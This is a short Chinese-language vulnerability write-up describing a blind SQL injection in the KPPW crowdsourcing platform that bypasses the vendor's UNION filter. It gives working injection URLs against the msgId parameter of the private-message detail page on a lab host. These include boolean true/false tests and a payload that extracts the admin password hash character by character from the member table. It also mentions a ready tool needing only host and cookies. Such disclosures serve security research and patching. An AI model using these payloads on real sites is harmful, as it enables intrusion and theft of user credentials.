KPPW开源威客系统绕过防护盲注

1.

kppw一处sql注入

厂商对这个漏洞进行了修复。替换了union 不能进行联合了

但是可以进行盲注。

同一个类型,多点。不过问题都出在消息这。

2.

注册两个帐号,然后其中一个对另外那个发送3个消息。

图片1.png

3.

打开中间那条 url如下

http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16

然后尝试注入

图片2.png

下面我们可以看到 上一条 和 下一条 。

注入测试

http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and 1=1--

图片3.png

存在。

http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and 1=2--

图片4.png

消失了。

3.

主要利用url

http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 and (select CHAR(48))=SUBSTR((SELECT password from keke_witkey_member WHERE uid =1),1,1)--

下面 写了一个小工具 替换下host url cookies就可以用了。

 

图片5.png